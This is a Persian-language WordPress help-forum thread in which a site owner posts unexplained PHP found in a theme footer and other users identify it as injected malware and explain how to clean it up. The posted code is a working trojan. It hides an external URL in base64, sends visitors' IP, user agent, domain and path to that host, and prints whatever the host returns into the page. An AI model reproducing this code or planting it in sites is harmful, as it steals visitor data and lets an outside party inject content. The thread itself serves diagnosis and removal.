• اطلاعیه ها

    • Morteza

      باهم بسازیم: اطلس ووکامرس و وردپرس   14/07/96

      تاپیک ایجاد شده برای بحث در جهت ایجاد یک منبع، ویکی، صفحات توضیحی و یا بخش آموزشی جامع برای وردپرس و متعلقات مختلف آن است. لطفا جهت مشارکت در این بحث، ارائه پیشنهاد و یا انتقاد به تاپیک فوق مراجعه کنید. باهم بسازیم: اطلس ووکامرس و وردپرس
M.Hajloo

کمک برای شناسایی یک کد در فوتر قالب

6 پست در این موضوع قرار دارد

درود

دوستان 1 کد توی فوتر قالب من وجود داره که نمیدونم کارش چی هست و اصلاً آیا بهش نیاز هست یا خیر

ممنون میشم 1 توضیحی بدید تا متوجه بشم کار این کد چیه :


<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}

0

به اشتراک گذاری این پست


لینک به پست

سلام

این کد یک نوع کد مخرب هستش که اگر فایل های دیگه رو هم نگاه کمنید مثل index.php و header.php به احتمال خیلی زیاد وجود داره

این کگد اطلاعات بازدید کننده شمارو به یک آمارگیر ارسال میکنه و یه جورایی تروجان هستش

3

به اشتراک گذاری این پست


لینک به پست

سلام

این کد یک نوع کد مخرب هستش که اگر فایل های دیگه رو هم نگاه کمنید مثل index.php و header.php به احتمال خیلی زیاد وجود داره

این کگد اطلاعات بازدید کننده شمارو به یک آمارگیر ارسال میکنه و یه جورایی تروجان هستش

kasra جان متشکرم بابت راهنمائی

تو قالب اختصاصی از این کدها پیدا کنی عجیبه والا !!

0

به اشتراک گذاری این پست


لینک به پست

kasra جان متشکرم بابت راهنمائی

تو قالب اختصاصی از این کدها پیدا کنی عجیبه والا !!

کد می تونه از یک افزونه هم انتقال پیدا کنه

هر فایلی می تونه مخرب باشه و دستور کپی یک تکه کد را روی یکی از برگه های قالب جاری بعد یا قبل از تگی مثل فوتر بده اگر باز هم همین مورد تکرار شد تگ فوتر را از قالب حذف کنید و تست بگیرید اگر مورد هم دیگه تکرار نشد بگردید دنبال افزونه ای که این کدها رو توش داشته باشه

4

به اشتراک گذاری این پست


لینک به پست

نه به قالب اختصاصی مربوط نمیشه چون این کد برای یک ایرانی نیست و نویسنده این تروجان یک غیر ایرانی هستش

این کد قبلن هم در انجمن یادمه توسط چند تا یوزر دیگه گذارش شده بود که خود به خود اضافه میشه

اونموقع تحقیق که کردم این یک تروجان هست که توی ویندوز وجود داره و اگر شما به وسیله ftp به هاست متصل بشی یا از آپلود سی پنل فایلی آپلود کنی ، به صورت خودکار این کد مخرب رو توی 3 فایل اصلی index.php & header.php & footer.php اضافه میکنه و اگر فایل رو دیکد کنی میبینی که اطلاعات بازدید کننده هارو دریافت میکنه و به یک آمارگیر خارجی میفرسته

مشکل خاصی نداره این کد اما با اینکه برای ربات های گوگل شرط گذاشته اما بازم گوگل میفهمه و سایت شمارو بلاک میکنه به عنوان مخرب

برای حل این مشکل :

سیستمت رو 100% پاکسازی کن و بعد برو به سی پنل و همه فایل های مشکوک رو پاک کن و بعد این کد رو از داخل همه فایل ها که همشونم اول فایل گذاشته شدرو پاک کن

اگر کارهارو درست انجام داده باشی دیگه کدی اضافه نمیشه

5

به اشتراک گذاری این پست


لینک به پست

ممنون از راهنمائی مفیدتون

سیستم را با آخرین آپدیت نود اسکن کردم مشکلی نبود

هاست را هم به وسیله آنتی ویروسش اسکن کردم که خدا را شکر چیزی نبود

چند روز پیش چند تا افزونه مثل پخش آنلاین موزیک و ... تست کردم که فکر کنم از روی همین ها اضافه شده بوده

این کد هم فقط تو فایل فوتر وجود داشت که حذف کردم

*سپاس*

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط mrasoul
      با عرض سلام و خسته نباشید ... لطفا این صفحه را ببینید :
      صفحه مورد نظر
      در این صفحه و بعد از ویدئو یک فهرست وجود دارد با آیتمهایی مثلا
      1.Introduction
      2.Brackets Extensions
      و ... که در اصل سرفصل های این آموزش است که شامل یکسری زیر مجموعه هستند ... وقتی روی زیرمجموعه ها کلیک می کنید اون مجموعه را نشان می دهید . به عنوان مثال روی
      1.2The Extension Manager
      کلیک کنید ...
      من اگر بخوام یک پست آموزشی کامل بسازم و تو این پست این سرفصل ها رو تعریف کنم آیا وردپرس امکانی رو داره بدون اینکه برای هر فصل یک پست ساخت همه ی پستها را داخل یک پست نوشت ؟ یعنی یک پست چند صفحه ایی مثلا مقدمه در خود پست و در مقدمه سرفصل ها رو تعریف کنیم حالا همون پست چند صفحه را زیرمجموعه داشته باشد که این صفحه ها همون سرفصل ها باشند .
      چون اگر قرار باشد برای هر فصل یک پست بفرستم طبیعتا کار بسیار مشکل و زمان بری است چرا که در هرکدام از این پستها باید با زمینه دلخواه سرفصل ها را تعریف کنم و هربار که پست جدید بفرستم در داخل بقیه سرفصل های قبل باید بروم و در زمینه دلخوه لینک این سرفصل جدید را تعریف کنم
       
    • توسط lloyd
      سلام دوستان خوبم اگر کسی میتواند پوسته The Voux را در هاست من نصب کند لطفا به من اینجا اطلاع بدهد. خطای نصب: شیوه نامه گم شده است !
       
    • توسط shayan201680
      با سلام
      بنده یک سایت اصلی وردپرسی دارم و قرار شده که در ساب دامینشم از وردپرس استفاده کنم.
      الان میخوام کاری کنم که کاربران اگر در سایت اصلی ثبت نام کردند بتونند با همون مشخصات در ساب دامین نیز لاگین کنند و برعکس!
      ولی نمیدونم باید چکار کنم! 
      ممنون میشم اگر کسی بلده راهنمایی کنه، با تشکر... 
    • توسط dastjerdisf
      با سلام
      در بین اساتید کسی می تونه به من کمک کنه بگه چرا وقتی آدرس سایتم رو می نویسم اتومات این متن رو به اون اضافه می کنه/?i=1
      از مدیریت هاست پرسیدم میگند از کش مرورگر هستش اما چرا سایت های دیگه این جوری نیستند
      آدرس سایتم:http://hushmandyar.ir
    • توسط saeid1872
      سلام دوستان
      تو کمتر از یک ماه سایتم 61 ارور 500 ثبت کرده که در حال زیاد شدن هستش نمیدونم چرا این ارورهارو ثبت میکنه
      لطفا دلیلش رو بگید و اینکه چطور باید رفع کنم
      من خیلی اصلا حرفه ای نیستم فقط خواهشا جوری راهنمایی کنید که بتونم رفعش کنم.